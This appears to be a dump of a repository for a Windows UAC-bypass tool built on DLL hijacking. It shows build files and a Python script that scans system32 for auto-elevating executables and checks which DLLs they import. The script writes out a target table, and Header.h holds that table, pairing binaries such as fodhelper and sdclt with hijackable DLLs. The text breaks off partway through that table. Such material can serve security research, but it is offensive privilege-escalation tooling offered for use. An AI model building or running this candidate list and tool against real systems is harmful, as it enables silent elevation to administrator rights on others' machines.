├── .gitattributes
├── .github
    └── workflows
    │   └── msbuild.yml
├── .gitignore
├── DLLHijacking.sln
├── DLLHijacking
    ├── CsvToHeader.py
    ├── DLLHijacking.vcxproj
    ├── DLLHijacking.vcxproj.filters
    ├── DLLHijacking.vcxproj.user
    ├── Header.h
    ├── UACBypass.rc
    ├── dll_hijacking_candidates.csv
    ├── main.c
    └── resource.h
├── ExploitResult.png
├── LICENSE
├── README.md
├── Release
    ├── DLLHijacking.exe
    └── test.dll
├── test
    ├── main.c
    ├── test.vcxproj
    ├── test.vcxproj.filters
    └── test.vcxproj.user
└── x64
    └── Release
        ├── DLLHijacking.exe
        └── test.dll


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/.github/workflows/msbuild.yml:
--------------------------------------------------------------------------------
 1 | name: MSBuild
 2 | 
 3 | on: [push]
 4 | 
 5 | env:
 6 |   # Path to the solution file relative to the root of the project.
 7 |   SOLUTION_FILE_PATH: .
 8 | 
 9 |   # Configuration type to build.
10 |   # You can convert this to a build matrix if you need coverage of multiple configuration types.
11 |   # https://docs.github.com/actions/learn-github-actions/managing-complex-workflows#using-a-build-matrix
12 |   BUILD_CONFIGURATION: Release
13 | 
14 | jobs:
15 |   build:
16 |     runs-on: windows-latest
17 | 
18 |     steps:
19 |     - uses: actions/checkout@v2
20 | 
21 |     - name: Add MSBuild to PATH
22 |       uses: microsoft/setup-msbuild@v1.0.2
23 | 
24 |     - name: Restore NuGet packages
25 |       working-directory: ${{env.GITHUB_WORKSPACE}}
26 |       run: nuget restore ${{env.SOLUTION_FILE_PATH}}
27 | 
28 |     - name: Build
29 |       working-directory: ${{env.GITHUB_WORKSPACE}}
30 |       # Add additional options to the MSBuild command line here (like platform or verbosity level).
31 |       # See https://docs.microsoft.com/visualstudio/msbuild/msbuild-command-line-reference
32 |       run: msbuild /m /p:Configuration=${{env.BUILD_CONFIGURATION}} ${{env.SOLUTION_FILE_PATH}}
33 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | .vs
 2 | Debug
 3 | x64/Debug
 4 | *.tlog
 5 | *_hide
 6 | DLLHijacking/Release/
 7 | DLLHijacking/Debug/
 8 | DLLHijacking/x64/
 9 | test/Release/
10 | test/Debug/
11 | test/x64/
12 | *.iobj
13 | *ipdb
14 | *pdb
15 | exploitable.log
16 | *.aps
17 | *.exp
18 | *.lib
19 | 


--------------------------------------------------------------------------------
/DLLHijacking.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30907.101
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLHijacking", "DLLHijacking\DLLHijacking.vcxproj", "{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}"
 7 | EndProject
 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test", "test\test.vcxproj", "{D641EC04-AF30-495D-B253-C636F0952EC3}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|x64 = Debug|x64
13 | 		Debug|x86 = Debug|x86
14 | 		Release|x64 = Release|x64
15 | 		Release|x86 = Release|x86
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Debug|x64.Build.0 = Debug|x64
20 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Debug|x86.ActiveCfg = Debug|Win32
21 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Debug|x86.Build.0 = Debug|Win32
22 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Release|x64.ActiveCfg = Release|x64
23 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Release|x64.Build.0 = Release|x64
24 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Release|x86.ActiveCfg = Release|Win32
25 | 		{D2A8A86A-8622-40F4-9E57-8B843E2F1FB4}.Release|x86.Build.0 = Release|Win32
26 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Debug|x64.ActiveCfg = Debug|x64
27 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Debug|x64.Build.0 = Debug|x64
28 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Debug|x86.ActiveCfg = Debug|Win32
29 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Debug|x86.Build.0 = Debug|Win32
30 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Release|x64.ActiveCfg = Release|x64
31 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Release|x64.Build.0 = Release|x64
32 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Release|x86.ActiveCfg = Release|Win32
33 | 		{D641EC04-AF30-495D-B253-C636F0952EC3}.Release|x86.Build.0 = Release|Win32
34 | 	EndGlobalSection
35 | 	GlobalSection(SolutionProperties) = preSolution
36 | 		HideSolutionNode = FALSE
37 | 	EndGlobalSection
38 | 	GlobalSection(ExtensibilityGlobals) = postSolution
39 | 		SolutionGuid = {4F4F846D-A3F8-45D7-A5C5-6A92595B13A4}
40 | 	EndGlobalSection
41 | EndGlobal
42 | 


--------------------------------------------------------------------------------
/DLLHijacking/CsvToHeader.py:
--------------------------------------------------------------------------------
  1 | import pefile
  2 | import os
  3 | import xml.etree.ElementTree as ET
  4 | import argparse
  5 | 
  6 | ############## Check PE ##############
  7 | #
  8 | 
  9 | class CheckPE():
 10 |     def __init__(self,pathFile):
 11 |         self.pathFile = pathFile
 12 |         self.exist = os.path.isfile(pathFile)
 13 |         if(self.exist):
 14 |             self.pe = pefile.PE(pathFile)
 15 |         
 16 |     def PeArch(self):
 17 |         arch = ""
 18 |         if self.pe.FILE_HEADER.Machine == 0x014c:
 19 |             arch = "x86"
 20 |         if self.pe.FILE_HEADER.Machine == 0x8664:
 21 |             arch = "x64" 
 22 |         return arch
 23 | 
 24 |     def GetManifest(self):
 25 |         if self.PeArch() == "x64" and hasattr(self.pe, 'DIRECTORY_ENTRY_RESOURCE'):
 26 |             for resource_type in self.pe.DIRECTORY_ENTRY_RESOURCE.entries:
 27 |                 name = "%s" % pefile.RESOURCE_TYPE.get(resource_type.struct.Id)
 28 |                 if name and hasattr(resource_type, 'directory'):
 29 |                     for resource_id in resource_type.directory.entries:
 30 |                         if hasattr(resource_id, 'directory'):
 31 |                             for resource_lang in resource_id.directory.entries:
 32 |                                 manifest = self.pe.get_data(
 33 |                                     resource_lang.data.struct.OffsetToData,
 34 |                                     resource_lang.data.struct.Size)
 35 |                                 if 'MANIFEST' in name:
 36 |                                     return manifest
 37 |         return b""
 38 | 
 39 |     # Check <autoElevate>true</autoElevate>
 40 |     def isAutoEleveate(self,manifest):
 41 |         try:
 42 |             myroot = ET.fromstring(manifest)
 43 |             for xml in myroot.findall('{urn:schemas-microsoft-com:asm.v3}application'):
 44 |                 for application in xml:
 45 |                     if("windowsSettings" in application.tag):
 46 |                         for windowsSettings in application:
 47 |                             if("autoElevate" in windowsSettings.tag):
 48 |                                 return windowsSettings.text == "true"
 49 |         except ET.ParseError as error:
 50 |             return False
 51 |         return False
 52 | 
 53 |     # Allows requireAdministrator, highestAvailable, asInvoker
 54 |     def isRequireAdministrator(self, manifest):
 55 |         try:
 56 |             myroot = ET.fromstring(manifest)
 57 |             for xml in myroot.findall('{urn:schemas-microsoft-com:asm.v3}trustInfo'):
 58 |                 for trustInfo in xml:
 59 |                     if("security" in trustInfo.tag):
 60 |                         for requestedPrivileges in trustInfo:
 61 |                             if("requestedPrivileges" in requestedPrivileges.tag):
 62 |                                 for requestedExecutionLevel in requestedPrivileges:
 63 |                                     if("requestedExecutionLevel" in requestedExecutionLevel.tag):
 64 |                                         level = requestedExecutionLevel.attrib["level"]
 65 |                                         return  level == "requireAdministrator" or level == "highestAvailable" or level == "asInvoker"
 66 |         except ET.ParseError as error:
 67 |             return False
 68 |         return False
 69 | 
 70 |     def ExeCheck(self):
 71 |         if(not self.exist):
 72 |             return False
 73 |         manifest = self.GetManifest().decode()
 74 |         return manifest != "" and self.isAutoEleveate(manifest) and self.isRequireAdministrator(manifest)
 75 | 
 76 |     def CheckValidDll(self,dllName):
 77 |         for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
 78 |             if(entry.dll.decode() == dllName):
 79 |                 return True
 80 |         return False
 81 | 
 82 | #
 83 | ############## Check PE ##############
 84 | 
 85 | 
 86 | 
 87 | ############# Gen struct #############
 88 | #
 89 | 
 90 | def CreateStruct(dllList):
 91 |     print("\ntypedef struct {\n"
 92 |     "\tconst char* name;\n"
 93 |     "\tconst char** dllTable;\n"
 94 |     "\tint tableSize;\n"
 95 |     "} DllList;\n")
 96 | 
 97 |     print("DllList dllList[] = {")
 98 |     for dll in dllList:
 99 |         print("\t{" + dll[0] + ", " + dll[1] + ", sizeof("+dll[1] +") / sizeof(char*)},")
100 |     print("};")
101 | 
102 | def ReadFromCSV(isCheckDllImport, filePath):
103 |     dllList = []
104 |     with open(filePath, 'r') as pFile:
105 |         Lines = pFile.readlines()
106 |         oldExe = ""
107 | 
108 |         for line in Lines:
109 |             if("DllMain" in line.strip()):
110 |                     strCut = line.strip().split(",")
111 |                     AutoElevated = strCut[0]
112 |                     exeName = strCut[1]
113 |                     dllName = strCut[2]
114 |                     exeFullPath = "c:\\windows\\system32\\" + exeName[1:-1]
115 |                     checkPE = CheckPE(exeFullPath)
116 | 
117 |                     if(checkPE.ExeCheck()):
118 |                         if(oldExe != exeName):
119 |                             varName = exeName[1:-5].replace("-","_").replace(".","_") + AutoElevated[0]
120 |                             dllList.append([exeName,varName])
121 |                             if(oldExe != ""):
122 |                                 print("};")
123 |                             print("const char*",varName + "[] = {")
124 |                             oldExe = exeName
125 |                         if(not isCheckDllImport):
126 |                             print("\t"+dllName + ",")
127 |                         elif(checkPE.CheckValidDll(dllName[1:-1])):
128 |                             print("\t"+dllName + ",")
129 |                         
130 |         print("};")
131 |         pFile.close()
132 |     return dllList
133 | 
134 | #
135 | ############# Gen struct #############
136 | 
137 | def ManageArg():
138 |     parser = argparse.ArgumentParser(description='CsvToHeader can be used to generate a header file from a CSV.', usage='%(prog)s -f [DLL_PATH] -c')
139 |     parser.version = 'CsvToHeader version: 0.0.1-Dev'
140 |     parser.add_argument('-f',  metavar=' [DLL_PATH]', type=str, help='Path of the csv to convert (default="dll_hijacking_candidates.csv")', default='dll_hijacking_candidates.csv')
141 |     parser.add_argument('-c',  help='Enable import dll in PE (default=False)', action='store_true', default=False)
142 |     parser.add_argument('-v', '--version', action='version', help='Show program\'s version number and exit')
143 |     try:
144 |         args = parser.parse_args()
145 |     except:
146 |         print("[x] Fail to parse arguments !")
147 |         exit(1)
148 |     return {'dllPath' : args.f,'isCheckDllImport' : args.c}
149 | 
150 | def main():
151 |     userConfig = ManageArg()
152 | 
153 |     dllList = ReadFromCSV(userConfig['isCheckDllImport'],userConfig['dllPath'])
154 |     CreateStruct(dllList)
155 |     exit(0)
156 | 
157 | main()


--------------------------------------------------------------------------------
/DLLHijacking/DLLHijacking.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{d2a8a86a-8622-40f4-9e57-8b843e2f1fb4}</ProjectGuid>
 25 |     <RootNamespace>DLLHijacking</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 92 |     </ClCompile>
 93 |     <Link>
 94 |       <SubSystem>Console</SubSystem>
 95 |       <GenerateDebugInformation>false</GenerateDebugInformation>
 96 |     </Link>
 97 |   </ItemDefinitionGroup>
 98 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 99 |     <ClCompile>
100 |       <WarningLevel>Level3</WarningLevel>
101 |       <FunctionLevelLinking>true</FunctionLevelLinking>
102 |       <IntrinsicFunctions>true</IntrinsicFunctions>
103 |       <SDLCheck>true</SDLCheck>
104 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
105 |       <ConformanceMode>true</ConformanceMode>
106 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
111 |       <OptimizeReferences>true</OptimizeReferences>
112 |       <GenerateDebugInformation>false</GenerateDebugInformation>
113 |     </Link>
114 |   </ItemDefinitionGroup>
115 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
116 |     <ClCompile>
117 |       <WarningLevel>Level3</WarningLevel>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
122 |     </ClCompile>
123 |     <Link>
124 |       <SubSystem>Console</SubSystem>
125 |       <GenerateDebugInformation>false</GenerateDebugInformation>
126 |     </Link>
127 |   </ItemDefinitionGroup>
128 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
129 |     <ClCompile>
130 |       <WarningLevel>Level3</WarningLevel>
131 |       <FunctionLevelLinking>true</FunctionLevelLinking>
132 |       <IntrinsicFunctions>true</IntrinsicFunctions>
133 |       <SDLCheck>true</SDLCheck>
134 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
135 |       <ConformanceMode>true</ConformanceMode>
136 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Console</SubSystem>
140 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
141 |       <OptimizeReferences>true</OptimizeReferences>
142 |       <GenerateDebugInformation>false</GenerateDebugInformation>
143 |     </Link>
144 |   </ItemDefinitionGroup>
145 |   <ItemGroup>
146 |     <ClCompile Include="main.c" />
147 |   </ItemGroup>
148 |   <ItemGroup>
149 |     <ClInclude Include="Header.h" />
150 |     <ClInclude Include="resource.h" />
151 |   </ItemGroup>
152 |   <ItemGroup>
153 |     <None Include="CsvToHeader.py" />
154 |     <None Include="dll_hijacking_candidates.csv" />
155 |   </ItemGroup>
156 |   <ItemGroup>
157 |     <ResourceCompile Include="UACBypass.rc" />
158 |   </ItemGroup>
159 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
160 |   <ImportGroup Label="ExtensionTargets">
161 |   </ImportGroup>
162 | </Project>


--------------------------------------------------------------------------------
/DLLHijacking/DLLHijacking.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClInclude Include="Header.h">
24 |       <Filter>Source Files</Filter>
25 |     </ClInclude>
26 |     <ClInclude Include="resource.h">
27 |       <Filter>Resource Files</Filter>
28 |     </ClInclude>
29 |   </ItemGroup>
30 |   <ItemGroup>
31 |     <None Include="dll_hijacking_candidates.csv">
32 |       <Filter>Source Files</Filter>
33 |     </None>
34 |     <None Include="CsvToHeader.py">
35 |       <Filter>Source Files</Filter>
36 |     </None>
37 |   </ItemGroup>
38 |   <ItemGroup>
39 |     <ResourceCompile Include="UACBypass.rc">
40 |       <Filter>Resource Files</Filter>
41 |     </ResourceCompile>
42 |   </ItemGroup>
43 | </Project>


--------------------------------------------------------------------------------
/DLLHijacking/DLLHijacking.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/DLLHijacking/Header.h:
--------------------------------------------------------------------------------
  1 | const char* dfrguiF [] = {
  2 | 	"SXSHARED.dll",
  3 | };
  4 | const char* djoinF [] = {
  5 | 	"dbgcore.DLL",
  6 | 	"JOINUTIL.DLL",
  7 | 	"logoncli.dll",
  8 | 	"netutils.dll",
  9 | 	"wdscore.dll",
 10 | 	"wkscli.dll",
 11 | };
 12 | const char* fsquirtF [] = {
 13 | 	"DEVOBJ.dll",
 14 | 	"dwmapi.dll",
 15 | 	"OLEACC.dll",
 16 | };
 17 | const char* lpksetupF [] = {
 18 | 	"CRYPTBASE.dll",
 19 | 	"dpx.dll",
 20 | };
 21 | const char* msdtF [] = {
 22 | 	"ATL.DLL",
 23 | 	"Cabinet.dll",
 24 | 	"SSPICLI.DLL",
 25 | 	"UxTheme.dll",
 26 | 	"wer.dll",
 27 | 	"WINHTTP.dll",
 28 | };
 29 | const char* msraF [] = {
 30 | 	"IPHLPAPI.DLL",
 31 | 	"NDFAPI.DLL",
 32 | 	"SspiCli.dll",
 33 | 	"USERENV.dll",
 34 | 	"UxTheme.dll",
 35 | 	"wdi.dll",
 36 | };
 37 | const char* sluiF [] = {
 38 | 	"CLDAPI.dll",
 39 | 	"CRYPTBASE.DLL",
 40 | 	"edputil.dll",
 41 | 	"FLTLIB.DLL",
 42 | 	"PROPSYS.dll",
 43 | 	"sppc.dll",
 44 | 	"WINBRAND.dll",
 45 | 	"WTSAPI32.dll",
 46 | };
 47 | const char* bthudtaskT [] = {
 48 | 	"DEVOBJ.dll",
 49 | };
 50 | const char* computerdefaultsT [] = {
 51 | 	"CRYPTBASE.DLL",
 52 | 	"edputil.dll",
 53 | 	"iertutil.dll",
 54 | 	"MLANG.dll",
 55 | 	"PROPSYS.dll",
 56 | 	"Secur32.dll",
 57 | 	"srvcli.dll",
 58 | 	"SSPICLI.DLL",
 59 | 	"urlmon.dll",
 60 | 	"WININET.dll",
 61 | 	"Wldp.dll",
 62 | };
 63 | const char* dccwT [] = {
 64 | 	"ColorAdapterClient.dll",
 65 | 	"dxva2.dll",
 66 | 	"mscms.dll",
 67 | 	"USERENV.dll",
 68 | };
 69 | const char* djoinT [] = {
 70 | 	"JOINUTIL.DLL",
 71 | 	"logoncli.dll",
 72 | 	"netprovfw.dll",
 73 | 	"netutils.dll",
 74 | 	"wdscore.dll",
 75 | 	"wkscli.dll",
 76 | };
 77 | const char* easinvokerT [] = {
 78 | 	"AUTHZ.dll",
 79 | 	"netutils.dll",
 80 | 	"samcli.dll",
 81 | 	"SAMLIB.dll",
 82 | };
 83 | const char* easpolicymanagerbrokerhostT [] = {
 84 | 	"InprocLogger.dll",
 85 | 	"msvcp110_win.dll",
 86 | 	"policymanager.dll",
 87 | 	"UMPDC.dll",
 88 | };
 89 | const char* fodhelperT [] = {
 90 | 	"CRYPTBASE.DLL",
 91 | 	"edputil.dll",
 92 | 	"iertutil.dll",
 93 | 	"MLANG.dll",
 94 | 	"netutils.dll",
 95 | 	"PROPSYS.dll",
 96 | 	"Secur32.dll",
 97 | 	"srvcli.dll",
 98 | 	"SSPICLI.DLL",
 99 | 	"urlmon.dll",
100 | 	"WININET.dll",
101 | 	"Wldp.dll",
102 | };
103 | const char* fsavailuxT [] = {
104 | 	"DEVOBJ.dll",
105 | 	"IfsUtil.dll",
106 | 	"ulib.dll",
107 | };
108 | const char* fsquirtT [] = {
109 | 	"DEVOBJ.dll",
110 | 	"DUser.dll",
111 | 	"MSWSOCK.dll",
112 | 	"OLEACC.dll",
113 | 	"OLEACCRC.DLL",
114 | 	"POWRPROF.dll",
115 | 	"TextShaping.dll",
116 | 	"UMPDC.dll",
117 | };
118 | const char* fxsunatdT [] = {
119 | 	"FXSAPI.dll",
120 | 	"IPHLPAPI.DLL",
121 | 	"PROPSYS.dll",
122 | 	"slc.dll",
123 | 	"sppc.dll",
124 | 	"VERSION.dll",
125 | };
126 | const char* immersivetpmvscmgrsvrT [] = {
127 | 	"DEVOBJ.dll",
128 | 	"profapi.dll",
129 | 	"WinSCard.dll",
130 | };
131 | const char* iscsicliT [] = {
132 | 	"DEVOBJ.dll",
133 | 	"ISCSIDSC.dll",
134 | 	"ISCSIUM.dll",
135 | 	"WMICLNT.dll",
136 | };
137 | const char* lpksetupT [] = {
138 | 	"dpx.dll",
139 | };
140 | const char* mdschedT [] = {
141 | 	"bcd.dll",
142 | };
143 | const char* mschedexeT [] = {
144 | 	"MaintenanceUI.dll",
145 | };
146 | const char* msconfigT [] = {
147 | 	"ATL.DLL",
148 | 	"bcd.dll",
149 | 	"MFC42u.dll",
150 | 	"VERSION.dll",
151 | };
152 | const char* msdtT [] = {
153 | 	"ATL.DLL",
154 | 	"Cabinet.dll",
155 | 	"DUI70.dll",
156 | 	"DUser.dll",
157 | 	"Secur32.dll",
158 | 	"SSPICLI.DLL",
159 | 	"UxTheme.dll",
160 | 	"wer.dll",
161 | 	"WINHTTP.dll",
162 | };
163 | const char* msraT [] = {
164 | 	"IPHLPAPI.DLL",
165 | 	"NDFAPI.DLL",
166 | 	"SspiCli.dll",
167 | 	"USERENV.dll",
168 | 	"UxTheme.dll",
169 | 	"wdi.dll",
170 | };
171 | const char* multidigimonT [] = {
172 | 	"NInput.dll",
173 | };
174 | const char* netplwizT [] = {
175 | 	"CRYPTBASE.dll",
176 | 	"DSROLE.dll",
177 | 	"MPR.dll",
178 | 	"NETPLWIZ.dll",
179 | 	"netutils.dll",
180 | 	"PROPSYS.dll",
181 | 	"samcli.dll",
182 | 	"SAMLIB.dll",
183 | };
184 | const char* optionalfeaturesT [] = {
185 | 	"DUI70.dll",
186 | 	"DUser.dll",
187 | 	"msi.dll",
188 | 	"OLEACC.dll",
189 | 	"osbaseln.dll",
190 | 	"PROPSYS.dll",
191 | };
192 | const char* perfmonT [] = {
193 | 	"ATL.DLL",
194 | 	"credui.dll",
195 | 	"SspiCli.dll",
196 | };
197 | const char* printuiT [] = {
198 | 	"IPHLPAPI.DLL",
199 | 	"printui.dll",
200 | 	"PROPSYS.dll",
201 | 	"puiapi.dll",
202 | 	"TextShaping.dll",
203 | };
204 | const char* recdiscT [] = {
205 | 	"bcd.dll",
206 | 	"Cabinet.dll",
207 | 	"ReAgent.dll",
208 | };
209 | const char* rstruiT [] = {
210 | 	"bcd.dll",
211 | 	"ktmw32.dll",
212 | 	"SPP.dll",
213 | 	"SRCORE.dll",
214 | 	"VSSAPI.DLL",
215 | 	"VssTrace.DLL",
216 | 	"wer.dll",
217 | };
218 | const char* sdcltT [] = {
219 | 	"bcd.dll",
220 | 	"Cabinet.dll",
221 | 	"CLDAPI.dll",
222 | 	"CRYPTBASE.DLL",
223 | 	"DPAPI.DLL",
224 | 	"edputil.dll",
225 | 	"FLTLIB.DLL",
226 | 	"iertutil.dll",
227 | 	"MPR.dll",
228 | 	"netutils.dll",
229 | 	"profapi.dll",
230 | 	"PROPSYS.dll",
231 | 	"ReAgent.dll",
232 | 	"SPP.dll",
